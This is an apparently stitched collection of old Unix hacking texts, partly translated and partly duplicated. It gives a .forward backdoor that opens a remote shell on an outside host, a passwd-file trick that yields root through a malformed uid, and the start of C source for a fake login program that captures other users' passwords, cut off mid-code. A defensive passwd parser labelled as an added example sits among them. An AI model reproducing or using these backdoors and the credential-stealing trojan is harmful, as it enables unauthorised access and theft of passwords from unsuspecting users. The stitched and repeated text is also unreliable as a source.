a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
Permutations of this method include alteration of the system's mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation; a more advanced one can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
PS: The above method is also useful for gaining access to a company's
mailhub (assuming there is a shared home directory FS on
the client and server).
> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).
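You may want to add:
.forward backdoor
On Unix, placing commands in a .forward file is a common method of regaining access. For the account 'username',
the .forward file might be configured as follows: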
username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
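Variations of this method include altering the system's mail aliases file (usually located at /etc/aliases). Note that this is only a simple variation. A more advanced one can run a simple script from .forward that executes arbitrary commands taken from standard input (after minor preprocessing).
> Using smrsh can effectively stop this backdoor (although it is quite possibly still a problem if you allow things like elm's filter or procmail, which can run programs themselves...).
(I do not understand this passage well, so I have attached the English. Corrections are welcome!)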
---------------------------------------------------------------------------
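You may be able to use this "feature" as a backdoor:
When an invalid uid/gid is specified in /etc/passwd, most implementations of login(1) do not detect the invalid
uid/gid, and atoi(3) sets the uid/gid to 0, which grants superuser privileges.
Example: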
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
On Linux, this sets the uid of user rmartin to 0.
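The parsing failure described above, shown beside a strict parser that an audit of /etc/passwd can use. This is an added example, not code from the original article or from any login(1) implementation; the function names are hypothetical and the sample entry is the one given above.

```c
/* Added example: function names are illustrative, not from any login(1). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Lenient parse, the behaviour the text describes: atoi() yields 0
 * when the field does not begin with a digit. */
static long parse_id_lenient(const char *field) { return atoi(field); }

/* Strict parse: 1 to 9 decimal digits and nothing else (the 9-digit cap
 * is a choice made here to rule out overflow). Returns -1 on any error. */
static long parse_id_strict(const char *field)
{
    size_t n = strspn(field, "0123456789");
    if (n == 0 || n > 9 || field[n] != '\0')
        return -1;
    return atol(field);
}

/* Copy colon-separated field n (0-based) of a passwd line into out.
 * strtok() is avoided because it collapses empty fields. 0 on success. */
static int passwd_field(const char *line, int n, char *out, size_t outlen)
{
    const char *p = line;
    while (n-- > 0) {
        if ((p = strchr(p, ':')) == NULL) return -1;
        p++;
    }
    size_t len = strcspn(p, ":\n");
    if (len >= outlen) return -1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 0;
}

/* Returns 1 if the uid (field 2) or gid (field 3) is not a clean number. */
int passwd_line_is_malformed(const char *line)
{
    char uid[32], gid[32];
    if (passwd_field(line, 2, uid, sizeof uid) || passwd_field(line, 3, gid, sizeof gid))
        return 1;
    return parse_id_strict(uid) < 0 || parse_id_strict(gid) < 0;
}

int main(void)
{
    const char *entry = "rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh";
    printf("lenient uid=%ld malformed=%d\n", parse_id_lenient("x50"), passwd_line_is_malformed(entry));
    return 0;
}
```

Running passwd_line_is_malformed() over every line of the password file flags entries like the one above before a lenient parser ever sees them.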
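Hack Techniques: Using Trojan Horses
UNIX Trojan Horses
------------------
Translated by Martin
Preface
----------
"UNIX security" is an oxymoron. It is a system that is easily broken
by brute-force attack. (Most UNIX systems do not hang up after repeated failed logins, and they also have many default login names such as root, bin, sys, uucp, etc.) Once you are logged in to the system, you can easily subdue it. If you know a little C, you can make the system work for you and completely bypass the system's security barriers to create your own logins, read anybody's files, and so on.
This article provides some C source code along these lines for readers to practice with.
Configuration Requirements
You need a valid account on a UNIX system. For best results, use a complete version of UNIX (such as 4.2bsd or AT&T System V) running on a real machine (a PDP/11, VAX, Pyramid, etc.). If you can get an account on your school's system, so much the better.
Note
This article was inspired by an article titled "Making UNIX Secure." in the April '86 issue of BYTE. In that article the authors say, "We hope the information provided is interesting but will not become a 'cookbook for vandals'. We have often intentionally omitted some details." I followed the general outline of that article and give examples based on the methods they mention.
Step One: Obtaining Passwords
The only skills you need are some basic knowledge of UNIX and C. However, you must have access to a terminal, such as one in your school's computer center.
When you log in to a typical UNIX system, you see something like this: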
Tiburon Systems 4.2bsd / System V (shark)
login: shark
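Password: (not displayed)
The program I provide simulates a login sequence. You run the program on a terminal and then leave. If some unsuspecting person comes along to log in, their login information is saved to a file and the screen displays "login incorrect".
They are then asked to log in again. The second time is the real login, and this time they succeed. Evidently those people are not very bright.
On the system, put the following source code into a file named 'horse.c'. Because systems differ between versions, you may need to modify the first 8 lines.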
----- Code Begins Here -----
/* this is what a 'C' comment looks like. You can leave them out. */
/* #define's are like macros you can use for configuration. */
#define SYSTEM " Tiburon Systems 4.2bsd UNIX (shark) "
/* The above string should be made to look like the message that your
* system prints when ready. Each represents a carriage return.
*/
#define LOGIN "login: "
/* The above is the login prompt. You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/
#define PASSWORD "password:"
/* The above is the password prompt. You shouldn't have to change
* it, either.
*/
#define WAIT 2
/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect." Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/
#define INCORRECT "Login incorrect. "
/* Change the above so it is what your system says when an incorrect
* login is given. You shouldn't have to change it.
*/
#define FILENAME "stuff"
/* FILENAME is the name of the file that the hacked passwords will